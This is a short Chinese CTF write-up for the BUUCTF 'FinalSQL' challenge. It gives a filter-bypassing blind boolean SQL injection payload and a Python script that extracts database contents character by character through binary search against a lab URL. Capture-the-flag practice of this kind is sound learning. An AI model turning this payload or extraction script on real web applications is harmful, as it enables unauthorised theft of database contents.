buu摸鱼日记19
[极客大挑战 2019]FinalSQL
现在做做,感觉geek题真的很适合入门,不仅不算很难而且确实很有新意
(还是做不来的我是人中屑)
做这个题走了一堆坑,还是修行不到家的结果
1^(ascii(substr((select(group_concat(password))from(geek.F1naI1y)),%d,1))<%d)^1
注意一下括号的书写问题,之前写进行绕过出一堆问题(调了两个小时)
import requests
url="http://762745cd-b7dc-4d95-9666-f997bed452d5.node3.buuoj.cn/search.php"
flag = ""
tablename="F1naI1y,Flaaaaag"
column = "id,fl4gawsl"
for i in range(1,1000):
high = 128
low = 32
mid = (high + low) // 2
while(high>low):
payload = {"id":"1^(ascii(substr((select(group_concat(fl4gawsl))from(geek.Flaaaaag)),%d,1))<%d)^1"%(i,mid)}
r = requests.get(url=url,params=payload).text
if "Click others~~~" in r:
high = mid
else:
low = mid + 1
mid = (high + low) // 2
# print(r)
flag += chr(int(mid-1))
print(flag)
网上有几个写法鸭羹就没用,好家伙,还我整了一晚上
PREVIOUSBuu摸鱼日记之十八
NEXTBuu摸鱼日记之二十